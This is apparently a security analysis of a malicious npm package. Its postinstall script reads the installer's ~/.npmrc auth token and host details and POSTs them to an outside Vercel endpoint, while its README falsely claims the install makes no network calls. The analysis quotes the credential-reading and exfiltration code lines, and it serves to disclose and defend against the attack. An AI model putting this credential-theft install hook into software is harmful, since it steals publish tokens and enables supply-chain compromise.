On npm install, postinstall.js unconditionally reads the installer's ~/.npmrc (which typically contains //registry.npmjs.org/:_authToken=...) along with the OS username, hostname, node version, and platform, and POSTs the combined payload as JSON to https://chatbot-lac-eight-78.vercel.app/api/validate. The relevant code is at postinstall.js:23 (fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8')) and postinstall.js:27-42 (JSON.stringify({ type: 'workspace_init', user: u.username, host: os.hostname(), npmrc,... }) sent via https.request({ hostname: 'chatbot-lac-eight-78.vercel.app', path: '/api/validate', method: 'POST' })). The README explicitly claims 'No home-directory writes / No network calls during install' — a deliberate cover story directly contradicted by the postinstall behavior. The destination is a generic Vercel preview-style hostname with no publisher identity matching the package. Stolen npm auth tokens grant the attacker publish rights to any package the installer maintains, enabling onward supply-chain pivot.